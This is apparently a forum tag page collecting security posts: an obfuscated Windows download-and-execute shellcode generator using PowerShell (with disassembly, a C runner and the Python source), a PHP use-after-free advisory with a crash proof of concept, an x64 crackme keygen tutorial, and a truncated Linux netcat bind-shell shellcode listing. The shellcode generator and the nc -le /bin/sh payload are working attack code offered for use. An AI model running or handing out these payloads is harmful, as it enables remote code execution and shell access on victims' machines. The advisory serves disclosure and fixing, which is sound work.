Search the Community
Showing results for tags 'mov'.
-
#Title: Obfuscated Shellcode Windows x86/x64 Download And Execute [Use PowerShell] - Generator #length: Dynamic ! depend on url and filename #Date: 20 January 2015 #Author: Ali Razmjoo #tested On: Windows 7 x64 ultimate #WinExec => 0x77b1e695 #ExitProcess => 0x77ae2acf #==================================== #Execute : #powershell -command "& { (New-Object Net.WebClient).DownloadFile('http://tartarus.org/~simon/putty-prerel-snapshots/x86/putty.exe', 'D:\Ali.exe')};D:\Ali.exe" #==================================== #Ali Razmjoo , ['Ali.Razmjoo1994@Gmail.Com','Ali@Z3r0D4y.Com'] #Thanks to my friends , Dariush Nasirpour and Ehsan Nezami #################################################### #How it work ? ''' C:\Users\Ali\Desktop>python "Windows x86 Download And Execute.py" Enter url Example: http://z3r0d4y.com/file.exe Enter:http://tartarus.org/~simon/putty-prerel-snapshots/x86/putty.exe Enter filename Example: D:\file.exe Enter:C:\Ali.exe C:\Users\Ali\Desktop>nasm -f elf shellcode.asm -o shellcode.o C:\Users\Ali\Desktop>objdump -D shellcode.o shellcode.o: file format elf32-i386 Disassembly of section .text: 00000000 <.text>: 0: 31 c0 xor %eax,%eax 2: 50 push %eax 3: 68 41 41 65 22 push $0x22654141 8: 58 pop %eax 9: c1 e8 08 shr $0x8,%eax c: c1 e8 08 shr $0x8,%eax f: 50 push %eax 10: b8 34 47 0b 4d mov $0x4d0b4734,%eax 15: bb 5d 69 6e 35 mov $0x356e695d,%ebx 1a: 31 d8 xor %ebx,%eax 1c: 50 push %eax 1d: b8 43 32 10 22 mov $0x22103243,%eax 22: bb 79 6e 51 4e mov $0x4e516e79,%ebx 27: 31 d8 xor %ebx,%eax 29: 50 push %eax 2a: b8 60 05 42 32 mov $0x32420560,%eax 2f: bb 49 78 79 71 mov $0x71797849,%ebx 34: 31 d8 xor %ebx,%eax 36: 50 push %eax 37: b8 0f 1c 2c 14 mov $0x142c1c0f,%eax 3c: bb 6a 64 49 33 mov $0x3349646a,%ebx 41: 31 d8 xor %ebx,%eax 43: 50 push %eax 44: b8 07 3e 0b 40 mov $0x400b3e07,%eax 49: bb 46 52 62 6e mov $0x6e625246,%ebx 4e: 31 d8 xor %ebx,%eax 50: 50 push %eax 51: b8 44 0a 78 07 mov $0x7780a44,%eax 56: bb 63 49 42 5b mov $0x5b424963,%ebx 5b: 31 d8 xor %ebx,%eax 5d: 50 push %eax 5e: b8 0f 16 4b 0d mov $0xd4b160f,%eax 63: bb 6a 31 67 2d mov $0x2d67316a,%ebx 68: 31 d8 xor %ebx,%eax 6a: 50 push %eax 6b: b8 18 62 5c 1f mov $0x1f5c6218,%eax 70: bb 61 4c 39 67 mov $0x67394c61,%ebx 75: 31 d8 xor %ebx,%eax 77: 50 push %eax 78: b8 1b 2d 1e 1f mov $0x1f1e2d1b,%eax 7d: bb 6b 58 6a 6b mov $0x6b6a586b,%ebx 82: 31 d8 xor %ebx,%eax 84: 50 push %eax 85: b8 45 40 41 66 mov $0x66414045,%eax 8a: bb 3d 78 77 49 mov $0x4977783d,%ebx 8f: 31 d8 xor %ebx,%eax 91: 50 push %eax 92: b8 02 1f 4b 45 mov $0x454b1f02,%eax 97: bb 6d 6b 38 6a mov $0x6a386b6d,%ebx 9c: 31 d8 xor %ebx,%eax 9e: 50 push %eax 9f: b8 24 3e 19 32 mov $0x32193e24,%eax a4: bb 45 4e 6a 5a mov $0x5a6a4e45,%ebx a9: 31 d8 xor %ebx,%eax ab: 50 push %eax ac: b8 00 5e 3a 35 mov $0x353a5e00,%eax b1: bb 6c 73 49 5b mov $0x5b49736c,%ebx b6: 31 d8 xor %ebx,%eax b8: 50 push %eax b9: b8 1f 37 40 24 mov $0x2440371f,%eax be: bb 6d 52 32 41 mov $0x4132526d,%ebx c3: 31 d8 xor %ebx,%eax c5: 50 push %eax c6: b8 2e 35 68 31 mov $0x3168352e,%eax cb: bb 5a 4c 45 41 mov $0x41454c5a,%ebx d0: 31 d8 xor %ebx,%eax d2: 50 push %eax d3: b8 48 1e 1c 15 mov $0x151c1e48,%eax d8: bb 67 6e 69 61 mov $0x61696e67,%ebx dd: 31 d8 xor %ebx,%eax df: 50 push %eax e0: b8 26 28 0d 5d mov $0x5d0d2826,%eax e5: bb 4f 45 62 33 mov $0x3362454f,%ebx ea: 31 d8 xor %ebx,%eax ec: 50 push %eax ed: b8 20 57 1d 45 mov $0x451d5720,%eax f2: bb 47 78 63 36 mov $0x36637847,%ebx f7: 31 d8 xor %ebx,%eax f9: 50 push %eax fa: b8 04 6a 24 3b mov $0x3b246a04,%eax ff: bb 77 44 4b 49 mov $0x494b4477,%ebx 104: 31 d8 xor %ebx,%eax 106: 50 push %eax 107: b8 18 0f 0a 32 mov $0x320a0f18,%eax 10c: bb 6c 6e 78 47 mov $0x47786e6c,%ebx 111: 31 d8 xor %ebx,%eax 113: 50 push %eax 114: b8 7d 18 3c 27 mov $0x273c187d,%eax 119: bb 52 6c 5d 55 mov $0x555d6c52,%ebx 11e: 31 d8 xor %ebx,%eax 120: 50 push %eax 121: b8 03 44 60 60 mov $0x60604403,%eax 126: bb 77 34 5a 4f mov $0x4f5a3477,%ebx 12b: 31 d8 xor %ebx,%eax 12d: 50 push %eax 12e: b8 47 6b 1f 20 mov $0x201f6b47,%eax 133: bb 6f 4c 77 54 mov $0x54774c6f,%ebx 138: 31 d8 xor %ebx,%eax 13a: 50 push %eax 13b: b8 2a 5e 2b 20 mov $0x202b5e2a,%eax 140: bb 6c 37 47 45 mov $0x4547376c,%ebx 145: 31 d8 xor %ebx,%eax 147: 50 push %eax 148: b8 59 07 12 0e mov $0xe120759,%eax 14d: bb 35 68 73 6a mov $0x6a736835,%ebx 152: 31 d8 xor %ebx,%eax 154: 50 push %eax 155: b8 01 59 11 2c mov $0x2c115901,%eax 15a: bb 45 36 66 42 mov $0x42663645,%ebx 15f: 31 d8 xor %ebx,%eax 161: 50 push %eax 162: b8 22 22 4e 5a mov $0x5a4e2222,%eax 167: bb 4c 56 67 74 mov $0x7467564c,%ebx 16c: 31 d8 xor %ebx,%eax 16e: 50 push %eax 16f: b8 00 37 1b 48 mov $0x481b3700,%eax 174: bb 43 5b 72 2d mov $0x2d725b43,%ebx 179: 31 d8 xor %ebx,%eax 17b: 50 push %eax 17c: b8 4a 1f 22 13 mov $0x13221f4a,%eax 181: bb 64 48 47 71 mov $0x71474864,%ebx 186: 31 d8 xor %ebx,%eax 188: 50 push %eax 189: b8 6a 23 03 18 mov $0x1803236a,%eax 18e: bb 4a 6d 66 6c mov $0x6c666d4a,%ebx 193: 31 d8 xor %ebx,%eax 195: 50 push %eax 196: b8 2d 54 57 1c mov $0x1c57542d,%eax 19b: bb 47 31 34 68 mov $0x68343147,%ebx 1a0: 31 d8 xor %ebx,%eax 1a2: 50 push %eax 1a3: b8 4e 15 36 5a mov $0x5a36154e,%eax 1a8: bb 39 38 79 38 mov $0x38793839,%ebx 1ad: 31 d8 xor %ebx,%eax 1af: 50 push %eax 1b0: b8 59 7f 1f 04 mov $0x41f7f59,%eax 1b5: bb 79 57 51 61 mov $0x61515779,%ebx 1ba: 31 d8 xor %ebx,%eax 1bc: 50 push %eax 1bd: b8 47 56 1d 2f mov $0x2f1d5647,%eax 1c2: bb 65 70 3d 54 mov $0x543d7065,%ebx 1c7: 31 d8 xor %ebx,%eax 1c9: 50 push %eax 1ca: b8 2c 18 08 54 mov $0x5408182c,%eax 1cf: bb 4d 76 6c 74 mov $0x746c764d,%ebx 1d4: 31 d8 xor %ebx,%eax 1d6: 50 push %eax 1d7: b8 5a 34 58 1b mov $0x1b58345a,%eax 1dc: bb 39 5b 35 76 mov $0x76355b39,%ebx 1e1: 31 d8 xor %ebx,%eax 1e3: 50 push %eax 1e4: b8 3f 0f 4b 41 mov $0x414b0f3f,%eax 1e9: bb 53 63 6b 6c mov $0x6c6b6353,%ebx 1ee: 31 d8 xor %ebx,%eax 1f0: 50 push %eax 1f1: b8 4a 1e 59 0b mov $0xb591e4a,%eax 1f6: bb 38 6d 31 6e mov $0x6e316d38,%ebx 1fb: 31 d8 xor %ebx,%eax 1fd: 50 push %eax 1fe: b8 49 2b 16 2a mov $0x2a162b49,%eax 203: bb 39 44 61 4f mov $0x4f614439,%ebx 208: 31 d8 xor %ebx,%eax 20a: 50 push %eax 20b: 89 e0 mov %esp,%eax 20d: bb 41 41 41 01 mov $0x1414141,%ebx 212: c1 eb 08 shr $0x8,%ebx 215: c1 eb 08 shr $0x8,%ebx 218: c1 eb 08 shr $0x8,%ebx 21b: 53 push %ebx 21c: 50 push %eax 21d: bb 95 e6 b1 77 mov $0x77b1e695,%ebx 222: ff d3 call *%ebx 224: bb cf 2a ae 77 mov $0x77ae2acf,%ebx 229: ff d3 call *%ebx C:\Users\Ali\Desktop> #you have your shellcode now ======================================= shellcode.c #include <stdio.h> #include <string.h> int main(){ unsigned char shellcode[]= "\x31\xc0\x50\x68\x41\x41\x65\x22\x58\xc1\xe8\x08\xc1\xe8\x08\x50\xb8\x34\x47\x0b?\x4d\xbb\x5d\x69\x6e\x35\x31\xd8\x50\xb8\x43\x32\x10\x22\xbb\x79\x6e\x51\x4e\x31?\xd8\x50\xb8\x60\x05\x42\x32\xbb\x49\x78\x79\x71\x31\xd8\x50\xb8\x0f\x1c\x2c\x14?\xbb\x6a\x64\x49\x33\x31\xd8\x50\xb8\x07\x3e\x0b\x40\xbb\x46\x52\x62\x6e\x31\xd8?\x50\xb8\x44\x0a\x78\x07\xbb\x63\x49\x42\x5b\x31\xd8\x50\xb8\x0f\x16\x4b\x0d\xbb?\x6a\x31\x67\x2d\x31\xd8\x50\xb8\x18\x62\x5c\x1f\xbb\x61\x4c\x39\x67\x31\xd8\x50?\xb8\x1b\x2d\x1e\x1f\xbb\x6b\x58\x6a\x6b\x31\xd8\x50\xb8\x45\x40\x41\x66\xbb\x3d?\x78\x77\x49\x31\xd8\x50\xb8\x02\x1f\x4b\x45\xbb\x6d\x6b\x38\x6a\x31\xd8\x50\xb8?\x24\x3e\x19\x32\xbb\x45\x4e\x6a\x5a\x31\xd8\x50\xb8\x00\x5e\x3a\x35\xbb\x6c\x73?\x49\x5b\x31\xd8\x50\xb8\x1f\x37\x40\x24\xbb\x6d\x52\x32\x41\x31\xd8\x50\xb8\x2e?\x35\x68\x31\xbb\x5a\x4c\x45\x41\x31\xd8\x50\xb8\x48\x1e\x1c\x15\xbb\x67\x6e\x69?\x61\x31\xd8\x50\xb8\x26\x28\x0d\x5d\xbb\x4f\x45\x62\x33\x31\xd8\x50\xb8\x20\x57?\x1d\x45\xbb\x47\x78\x63\x36\x31\xd8\x50\xb8\x04\x6a\x24\x3b\xbb\x77\x44\x4b\x49?\x31\xd8\x50\xb8\x18\x0f\x0a\x32\xbb\x6c\x6e\x78\x47\x31\xd8\x50\xb8\x7d\x18\x3c?\x27\xbb\x52\x6c\x5d\x55\x31\xd8\x50\xb8\x03\x44\x60\x60\xbb\x77\x34\x5a\x4f\x31?\xd8\x50\xb8\x47\x6b\x1f\x20\xbb\x6f\x4c\x77\x54\x31\xd8\x50\xb8\x2a\x5e\x2b\x20?\xbb\x6c\x37\x47\x45\x31\xd8\x50\xb8\x59\x07\x12\x0e\xbb\x35\x68\x73\x6a\x31\xd8?\x50\xb8\x01\x59\x11\x2c\xbb\x45\x36\x66\x42\x31\xd8\x50\xb8\x22\x22\x4e\x5a\xbb?\x4c\x56\x67\x74\x31\xd8\x50\xb8\x00\x37\x1b\x48\xbb\x43\x5b\x72\x2d\x31\xd8\x50?\xb8\x4a\x1f\x22\x13\xbb\x64\x48\x47\x71\x31\xd8\x50\xb8\x6a\x23\x03\x18\xbb\x4a?\x6d\x66\x6c\x31\xd8\x50\xb8\x2d\x54\x57\x1c\xbb\x47\x31\x34\x68\x31\xd8\x50\xb8?\x4e\x15\x36\x5a\xbb\x39\x38\x79\x38\x31\xd8\x50\xb8\x59\x7f\x1f\x04\xbb\x79\x57?\x51\x61\x31\xd8\x50\xb8\x47\x56\x1d\x2f\xbb\x65\x70\x3d\x54\x31\xd8\x50\xb8\x2c?\x18\x08\x54\xbb\x4d\x76\x6c\x74\x31\xd8\x50\xb8\x5a\x34\x58\x1b\xbb\x39\x5b\x35?\x76\x31\xd8\x50\xb8\x3f\x0f\x4b\x41\xbb\x53\x63\x6b\x6c\x31\xd8\x50\xb8\x4a\x1e?\x59\x0b\xbb\x38\x6d\x31\x6e\x31\xd8\x50\xb8\x49\x2b\x16\x2a\xbb\x39\x44\x61\x4f?\x31\xd8\x50\x89\xe0\xbb\x41\x41\x41\x01\xc1\xeb\x08\xc1\xeb\x08\xc1\xeb\x08\x53?\x50\xbb\x95\xe6\xb1\x77\xff\xd3\xbb\xcf\x2a\xae\x77\xff\xd3"; fprintf(stdout,"Length: %d\n\n",strlen(shellcode)); (*(void(*)()) shellcode)(); } ======================================= C:\Users\Ali\Desktop>gcc shellcode.c -o shellcode.exe C:\Users\Ali\Desktop>shellcode.exe Length: 173 C:\Users\Ali\Desktop> #notice : when program exit, you must wait 2-3 second , it will finish download and execute file after 2-3 second ''' import random,binascii chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz123456789=[]-' p1 = '''xor eax,eax push eax ''' p2 = ''' mov eax,esp mov ebx,0x01414141 shr ebx,0x08 shr ebx,0x08 shr ebx,0x08 push ebx push eax mov ebx,0x77b1e695 call ebx mov ebx,0x77ae2acf call ebx ''' sen1 = str(raw_input('Enter url\nExample: http://z3r0d4y.com/file.exe \nEnter:')) sen1 = sen1.rsplit() sen1 = sen1[0] sen2 = str(raw_input('Enter filename\nExample: D:\\file.exe\nEnter:')) sen2 = sen2.rsplit() sen2 = sen2[0] sen = '''powershell -command "& { (New-Object Net.WebClient).DownloadFile('%s', '%s')};%s"''' %(sen1,sen2,sen2) m = 0 for word in sen: m += 1 m = m - 1 stack = '' while(m>=0): stack += sen[m] m -= 1 stack = stack.encode('hex') skip = 1 if len(stack) % 8 == 0: skip = 0 if skip is 1: stack = '00' + stack if len(stack) % 8 == 0: skip = 0 if skip is 1: stack = '00' + stack if len(stack) % 8 == 0: skip = 0 if skip is 1: stack = '00' + stack if len(stack) % 8 == 0: skip = 0 if len(stack) % 8 == 0: zxzxzxz = 0 m = len(stack) / 8 c = 0 n = 0 z = 8 shf = open('shellcode.asm','w') shf.write(p1) shf.close() shf = open('shellcode.asm','a') while(c<m): v = 'push 0x' + stack[n:z] skip = 0 if '0x000000' in v: skip = 1 q1 = v[13:] v = 'push 0x' + q1 + '414141' + '\n' + 'pop eax\nshr eax,0x08\nshr eax,0x08\nshr eax,0x08\npush eax\n' if '0x0000' in v: skip = 1 q1 = v[11:] v = 'push 0x' + q1 + '4141' + '\n' + 'pop eax\nshr eax,0x08\nshr eax,0x08\npush eax\n' if '0x00' in v: skip = 1 q1 = v[9:] v = 'push 0x' + q1 + '41' + '\n' + 'pop eax\nshr eax,0x08\npush eax\n' if skip is 1: shf.write(v) if skip is 0: v = v.rsplit() zzz = '' for w in v: if '0x' in w: zzz = str(w) s1 = binascii.b2a_hex(''.join(random.choice(chars) for i in range(4))) s1 = '0x%s'%s1 data = "%x" % (int(zzz, 16) ^ int(s1, 16)) v = 'mov eax,0x%s\nmov ebx,%s\nxor eax,ebx\npush eax\n'%(data,s1) shf.write(v) n += 8 z += 8 c += 1 shf.write(p2) shf.close()
-
Use-After-Free in PHP May 20, 2015 Advisory ID: HTB23262 Product: PHP Vendor: PHP Group Vulnerable Versions: 5.6.9 and probably prior Tested Version: 5.6.9 Advisory Publication: May 20, 2015 [without technical details] Vendor Notification: May 20, 2015 Vendor Fix: June 2, 2015 Public Disclosure: June 10, 2015 Latest Update: June 9, 2015 Vulnerability Type: Use After Free [CWE-416] CVE Reference: Pending Risk Level: Medium CVSSv2 Base Score: 4.6 Solution Status: Fixed by Vendor Discovered and Provided: High-Tech Bridge Security Research Lab Advisory Details: High-Tech Bridge Security Research Lab discovered use-after-free vulnerability in a popular programming language PHP, which can be exploited to cause crash and possibly execute arbitrary code on the target system. The vulnerability resides within the 'spl_heap_object_free_storage()' PHP function when trying to dereference already freed memory. A local attacker can cause segmentation fault or possibly execute arbitrary code on the target system with privileges of webserver. Below is a simple code that will trigger a crash: <?php class SplMinHeap1 extends SplMinHeap { public function compare($a, $ { return -parent::notexist($a, $; } } $h = new SplMinHeap1(); $h->insert(1); $h->insert(6); $h->insert(5); $h->insert(2); ?> Running the following PoC we get: gdb-peda$ r ~/Desktop/heap_uaf.php Starting program: /usr/local/bin/php ~/Desktop/heap_uaf.php PHP Fatal error: Call to undefined method SplMinHeap::notexist() in /home/test/Desktop/heap_uaf.php on line 4 Fatal error: Call to undefined method SplMinHeap::notexist() in /home/test/Desktop/heap_uaf.php on line 4 Program received signal SIGSEGV, Segmentation fault. [----------------------------------------------------------------------- ---registers-------------------------------------------------------------------- -------] RAX: 0x5a5a5a5a5a5a5a5a (ZZZZZZZZ) RBX: 0x8000000 RCX: 0xcd0458 ("/home/test/De"...) RDX: 0x16f RSI: 0xcd0458 ("/home/test/De"...) RDI: 0x5a5a5a5a5a5a5a5a (ZZZZZZZZ) RBP: 0x7fffffffc570 --> 0x7fffffffc5a0 --> 0x7fffffffc5d0 --> 0x7fffffffc600 --> 0x7fffffffc630 --> 0x7fffffffc750 --> 0x7fffffffc850 --> 0x7fffffffc9b0 --> 0x7fffffffdcf0 --> 0x7fffffffde50 --> 0x0 RSP: 0x7fffffffc570 --> 0x7fffffffc5a0 --> 0x7fffffffc5d0 --> 0x7fffffffc600 --> 0x7fffffffc630 --> 0x7fffffffc750 --> 0x7fffffffc850 --> 0x7fffffffc9b0 --> 0x7fffffffdcf0 --> 0x7fffffffde50 --> 0x0 RIP: 0x82a96f (<zval_delref_p+12>: mov eax,DWORD PTR [rax+0x10]) R8 : 0x269 R9 : 0x0 R10: 0x7fffffff9b20 --> 0x0 R11: 0x7ffff71102f0 --> 0xfffda6c0fffda3ef R12: 0x4209e0 (<_start>: xor ebp,ebp) R13: 0x7fffffffdf30 --> 0x2 R14: 0x0 R15: 0x0 [-------------------------------------------------------------------------- ---code------------------------------------------------------------------------- ----] 0x82a964 <zval_delref_p+1>: mov rbp,rsp 0x82a967 <zval_delref_p+4>: mov QWORD PTR [rbp-0x8],rdi 0x82a96b <zval_delref_p+8>: mov rax,QWORD PTR [rbp-0x8] => 0x82a96f <zval_delref_p+12>: mov eax,DWORD PTR [rax+0x10] 0x82a972 <zval_delref_p+15>: lea edx,[rax-0x1] 0x82a975 <zval_delref_p+18>: mov rax,QWORD PTR [rbp-0x8] 0x82a979 <zval_delref_p+22>: mov DWORD PTR [rax+0x10],edx 0x82a97c <zval_delref_p+25>: mov rax,QWORD PTR [rbp-0x8] [-------------------------------------------------------------------- --------stack------------------------------------------------------------------- ----------] As seen above when trying to dereference the value from $rax (which has been already freed) PHP crashes. Stopped reason: SIGSEGV 0x000000000082a96f in zval_delref_p (pz=0x5a5a5a5a5a5a5a5a) at /home/test/Desktop/php-5.6.9/Zend/zend.h:411 411 return --pz->refcount__gc; Running the backtrace command we can see a couple of freed variables: zval_ptr, pz gdb-peda$ bt #0 0x000000000082a96f in zval_delref_p (pz=0x5a5a5a5a5a5a5a5a) at /home/test/Desktop/php-5.6.9/Zend/zend.h:411 #1 0x000000000082aafb in i_zval_ptr_dtor (zval_ptr=0x5a5a5a5a5a5a5a5a, __zend_filename=0xcd0458 "/home/test/De"..., __zend_lineno=0x16f) at /home/test/Desktop/php-5.6.9/Zend/zend_execute.h:76 #2 0x000000000082bdcb in _zval_ptr_dtor (zval_ptr=0x7ffff7fcba88, __zend_filename=0xcd0458 "/home/test/De"..., __zend_lineno=0x16f) at /home/test/Desktop/php-5.6.9/Zend/zend_execute_API.c:424 #3 0x00000000006e5c1a in spl_heap_object_free_storage (object=0x7ffff7dfdfa0) at /home/test/Desktop/php-5.6.9/ext/spl/spl_heap.c:367 #4 0x000000000087f566 in zend_objects_store_free_object_storage (objects=0x102e640 <executor_globals+928>) at /home/test/Desktop/php-5.6.9/Zend/zend_objects_API.c:97 #5 0x000000000082b89e in shutdown_executor () at /home/test/Desktop/php-5.6.9/Zend/zend_execute_API.c:290 #6 0x0000000000841a4c in zend_deactivate () at /home/test/Desktop/php-5.6.9/Zend/zend.c:960 #7 0x00000000007a7c40 in php_request_shutdown (dummy=0x0) at /home/test/Desktop/php-5.6.9/main/main.c:1882 #8 0x00000000008f6501 in do_cli (argc=0x2, argv=0x1032560) at /home/test/Desktop/php-5.6.9/sapi/cli/php_cli.c:1177 #9 0x00000000008f6d8b in main (argc=0x2, argv=0x1032560) at /home/test/Desktop/php-5.6.9/sapi/cli/php_cli.c:1378 #10 0x00007ffff6faaec5 in __libc_start_main () from /lib/x86_64-linux-gnu/libc.so.6 #11 0x0000000000420a09 in _start () Lastly, from stack #2 we clearly see that the zval_ptr pointer (0x7ffff7fcba88) points to freed memory: gdb-peda$ x/50xw 0x7ffff7fcba88 0x7ffff7fcba88: 0x5a5a5a5a 0x5a5a5a5a 0x5a5a5a5a 0x5a5a5a5a 0x7 ffff7fcba98: 0x5a5a5a5a 0x5a5a5a5a 0x5a5a5a5a 0x5a5a5a5a 0x7ffff7fcbaa8: 0x5a5a 5a5a 0x5a5a5a5a 0x5a5a5a5a 0x5a5a5a5a 0x7ffff7fcbab8: 0x5a5a5a5a 0x5a5a5a5a 0x5 a5a5a5a 0x5a5a5a5a 0x7ffff7fcbac8: 0x5a5a5a5a 0x5a5a5a5a 0x5a5a5a5a 0x5a5a5a5a 0x7ffff7fcbad8: 0x5a5a5a5a 0x5a5a5a5a 0x5a5a5a5a 0x5a5a5a5a 0x7ffff7fcbae8: 0x 5a5a5a5a 0x5a5a5a5a 0x5a5a5a5a 0x5a5a5a5a 0x7ffff7fcbaf8: 0x5a5a5a5a 0x5a5a5a5a 0x5a5a5a5a 0x5a5a5a5a 0x7ffff7fcbb08: 0x5a5a5a5a 0x5a5a5a5a 0x5a5a5a5a 0x5a5a5 a5a 0x7ffff7fcbb18: 0x5a5a5a5a 0x5a5a5a5a 0x5a5a5a5a 0x5a5a5a5a 0x7ffff7fcbb28 : 0x5a5a5a5a 0x5a5a5a5a 0x5a5a5a5a 0x5a5a5a5a 0x7ffff7fcbb38: 0x5a5a5a5a 0x5a5a 5a5a 0x5a5a5a5a 0x5a5a5a5a 0x7ffff7fcbb48: 0x5a5a5a5a 0x5a5a5a5a This vulnerability was successfully reproduced Ubuntu 14.04.1 LTS (32 bit and 64 bit) on the latest version of PHP 5.6.9. ImmuniWeb® On-Demand Web Application Penetration Test Solution: Apply Vendor's patch. More Information: https://bugs.php.net/bug.php?id=69737 72.52.91.13 Git - php-src.git/commit References: [1] High-Tech Bridge Advisory HTB23262 - https://www.htbridge.com/advisory/HTB23262 - Use-After-Free in PHP. [2] PHP - PHP: Hypertext Preprocessor - PHP is a popular general-purpose scripting language that is especially suited to web development. [3] Common Weakness Enumeration (CWE) - CWE - Common Weakness Enumeration - targeted to developers and security practitioners, CWE is a formal list of software weakness types. [4] ImmuniWeb® - a PCI compliant web application penetration test combined with managed vulnerability scan. Configure, schedule, and manage online 24/7. Source : https://www.htbridge.com/advisory/HTB23262
-
Keygenning is a process of finding a valid key for a program. It is used for cracking/piracy. Most of the cracking has been documented on x86, there haven’t been many articles on x64 cracking. In this article, we will show you how to keygen a Linux x64 bit application on a Linux computer. For purpose we will use 1: Linux machine ( 64bit mint box) 2: EDB debugger 3: IDA Disassembler 4: Compiler to write a key generator 5: Fill out the form below for the files associated with this article Let’s run file command to check the type of file. file r5 r5: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=86bf854ce620288567d153883d4609163485d34d, not stripped From the output, we see the build version, and it is a dynamically linked file. ~/Desktop $ nm r5 0000000000601109 B __bss_start 00000000006010e0 D buf 000000000040069d T check_password 0000000000601109 b completed.6972 0000000000601060 D __data_start 0000000000601060 W data_start 00000000006010a0 D delta 00000000004005e0 t deregister_tm_clones 0000000000400650 t __do_global_dtors_aux 0000000000600e18 t __do_global_dtors_aux_fini_array_entry 0000000000601068 D __dso_handle 0000000000600e28 d _DYNAMIC 0000000000601109 D _edata 0000000000601110 B _end 0000000000400894 T _fini 0000000000400670 t frame_dummy 0000000000600e10 t __frame_dummy_init_array_entry 0000000000400a80 r __FRAME_END__ 0000000000601000 d _GLOBAL_OFFSET_TABLE_ w __gmon_start__ 0000000000400500 T _init 0000000000600e18 t __init_array_end 0000000000600e10 t __init_array_start 00000000004008a0 R _IO_stdin_used w _ITM_deregisterTMCloneTable w _ITM_registerTMCloneTable 0000000000600e20 d __JCR_END__ 0000000000600e20 d __JCR_LIST__ w _Jv_RegisterClasses 0000000000400890 T __libc_csu_fini 0000000000400820 T __libc_csu_init U __libc_start_main@@GLIBC_2.2.5 00000000004007b6 T main 0000000000601080 D master U printf@@GLIBC_2.2.5 U puts@@GLIBC_2.2.5 U random@@GLIBC_2.2.5 0000000000400610 t register_tm_clones 00000000004005b0 T _start U strcmp@@GLIBC_2.2.5 U strcpy@@GLIBC_2.2.5 U strlen@@GLIBC_2.2.5 0000000000601110 D __TMC_END__ x64 assembly basics x64 consists of extended register set and some extra instructions are added as well. Following is the list of added registers in x64 r8, r9 , r10, r11, r12, r13, r14, r15 Lower 32 bits of r8 can be accessed by r8d, lower 16 bits can be accessed by r8w and lower 8 bits can be accessed by rb8 and more over RIP (instruction pointer) can be directly accessed. All the register in x64 are 64bit in sizes . RIP is also 64bit but Current implementations only support 48 bit linear addresses. In addition to normal registers it also added SSE registers namely from xmm8 – xmm15 If any data movement operation is performed on EAX, it zero extends the higher 32 bits of RAX register. Some added instructions are lodsq, stosq etc. For the purpose of debugging, we will use an x64 debugger known as EDB on Linux. This debugger is similar to ollydbg (windows) and is quite easy to use .Following is the default pane of EDB Argument passing in x64 is quite different from x86 itself Arguments are passed in registers RDI, RSI, RDX, RCX, r8 and r9 rest of the parameters are passed on the stack Navigation is simple just like ollydbg Running our crackme file just like that gives us the following output /Desktop $ ./r5 Usage: ./r5 password Maybe plaintext isn’t good after all. Which gives us a hint that it requires a password, which we have to figure out Opening it in a disassembler gives us an idea of what is happening around. Apparently it is looking for a parameter and is passing it to a function Clearly you can see that it passing argv[1] as a parameter to function check_password() The first hint is about the length of the input string, which should be equal to the length of “this_is_not_even_interesting_its_garbage” .data:00000000006010E0 ; char buf[] .data:00000000006010E0 buf db 'this_is_not_even_interesting_its_garbage',0 .data:00000000006010E0 ; DATA XREF: check_password+1C#o .data:00000000006010E0 ; check_password+3C#o ... .data:00000000006010E0 _data ends .data:00000000006010E0 .bss:0000000000601109 ; =========================================================================== and is checked here call _strlen ; Call Procedure mov rbx, rax mov edi, offset buf ; “this_is_not_even_interesting_its_garbag”… call _strlen ; Call Procedure cmp rbx, rax ; Compare Two Operands jz short Go ; Jump if Zero (ZF=1) After that, this string is replaced by our own input string mov rax, [rbp+passcode] mov rsi, rax ; src mov edi, offset buf ; "this_is_not_even_interesting_its_garbag"... call _strcpy ; Call Procedure mov [rbp+VarCheck], 1 jmp loc_400791 ; Jump After this operation program goes in a loop and loop body is skipped if value at index of variable delta is zero movzx eax, delta[rax] ; If not, it performs some mathematical operations on the input strings leveraging on delta and other parameters which can be represented in C language as x = (random() % delta[index] ) + 1; delta[index] = delta[index] - x; var_check = var_check ^ (unsigned int )delta[index] ; random() call is not initialized with srand() so it can be predicted easily. Finally, after the 40 rounds of loop, the mutated string is compared against “this_aint_that_simple_but_good_luck_haha” and if it is equal, “password OK” message is printed Now to calculate that string we can perform the exact opposite on this string to get out key We can use the following C program to do so. #include <stdio.h> unsigned char delta[] = { 3, 253, 3, 249, 0, 3, 6, 0, 241, 0, 250, 7, 22, 235, 8, 252, 246, 2, 254, 243, 4, 19, 1, 234, 237, 15, 253, 240, 242, 15, 12, 243, 241, 12, 7, 0, 5, 14, 10, 4, }; unsigned char buff [48] ; int main(int argc, char **argv) { int index = 0; int var_check = 1; unsigned char x = '\x00'; strcpy(buff, "this_aint_that_simple_but_good_luck_haha"); while ( var_check ) { index = 0; var_check = 0; while ( index < 40) { if (delta[index]) { x = (random() % delta[index] ) + 1; delta[index] = delta[index] - x; var_check = var_check ^ (unsigned int )delta[index] ; buff[index] = buff[index] + x; } // if zero index++; } } printf("%s\n", buff); } Compiling and running this program gives us the following output: “well_done_now_go_on_irc_and_ask_for_more” ~/Desktop $ ./r5 “well_done_now_go_on_irc_and_ask_for_more” password OK Source
-
- call
- delta[index]
-
(and 3 more)
Tagged with:
-
/* # Linux x86 /bin/nc -le /bin/sh -vp 17771 shellcode # This shellcode will listen on port 17771 and give you /bin/sh # Shellcode Author: Oleg Boytsev # Tested on: Debian GNU/Linux 7/i686 # Shellcode Length: 58 # Command: gcc -m32 -z execstack x86_Linux_netcat_shellcode.c -o x86_Linux_netcat_shellcode global _start section .text _start: xor eax, eax xor edx, edx push eax push 0x31373737 ;-vp17771 push 0x3170762d mov esi, esp push eax push 0x68732f2f ;-le//bin//sh push 0x6e69622f push 0x2f656c2d mov edi, esp push eax push 0x636e2f2f ;/bin//nc push 0x6e69622f mov ebx, esp push edx push esi push edi push ebx mov ecx, esp mov al,11 int 0x80 */ #include<stdio.h> #include<string.h> unsigned char shellcode[] = 